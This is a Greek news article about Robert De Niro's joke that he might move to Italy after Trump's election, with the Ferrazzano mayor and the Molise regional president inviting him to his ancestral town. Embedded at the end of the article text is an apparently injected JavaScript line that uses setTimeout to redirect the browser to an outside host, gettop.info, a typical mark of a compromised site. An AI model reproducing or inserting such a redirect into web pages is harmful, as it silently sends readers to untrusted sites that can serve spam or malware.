Στην Ιταλία περιμένουν τον «μετανάστη» Ντε Νίρο

0
12

 

Ίσως χρειαστεί και να μεταναστεύσω στην Ιταλία τώρα που νίκησε ο Τραμπ, είπε αστειευόμενος ο Ρόμπερτ Ντε Νίρο, ο οποίος όπως τόνισε δεν έχει επισκεφθεί ποτέ τους τόπους των προγόνων του.

Ο θρυλικός ηθοποιός κατάγεται από την περιφέρεια Μολίζε, μία από τις μικρότερες της Ιταλίας και συγκεκριμένα την πόλη Φερατσάνο.

«Αν, έπειτα από την απογοήτευση της εκλογής Τραμπ, επιθυμεί να βρει καταφύγιο εδώ, θα είναι τιμή μας να τον υποδεχθούμε«, τόνισε ο δήμαρχος της πόλης Αντόνιο Τσέριο.

Ο σταρ διατηρεί την αμερικανική και την ιταλική υπηκοότητά του, ενώ στην περιοχή της Μολίζε μετανάστευσαν οι προπαππούδες του το 1890. «Πριν χρόνια αφιερώσαμε σε αυτόν ένα φεστιβάλ κινηματογράφου, αλλά δεν ήρθε«, σχολίασε ο δήμαρχος.

Ο πρόεδρος της περιφέρειας εξέφρασε την ελπίδα ο Ντε Νίρο τουλάχιστον να επισκεφθεί την περιοχή, αν όχι να μεταναστεύσει για τα καλά εκεί. «Αφού εξέπληξε τον κόσμο, ο Ντόναλντ Τραμπ μπορεί να οδηγήσει και σε αυτό: Σε μια επίσκεψη, επιτέλους, του Ρόμπερτ Ντε Νίρο στο Φερατσάνο«, δήλωσε ο Πάολο Φρατούρα.

«Να υποδεχθεί κάποιος μία προσωπικότητα σαν τον Ντε Νίρο θα αποτελέσει μια εξαιρετική διαφήμιση για μας διεθνώς. Αυτό είναι το κατάλληλο μέρος στο οποίο μπορεί να ξεχάσει την εκλογική ήττα της Χίλαρι Κλίντον και να αποφύγει να χρειαστεί να δείρει τον Τραμπ«, συμπλήρωσε ο Φρατούρα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here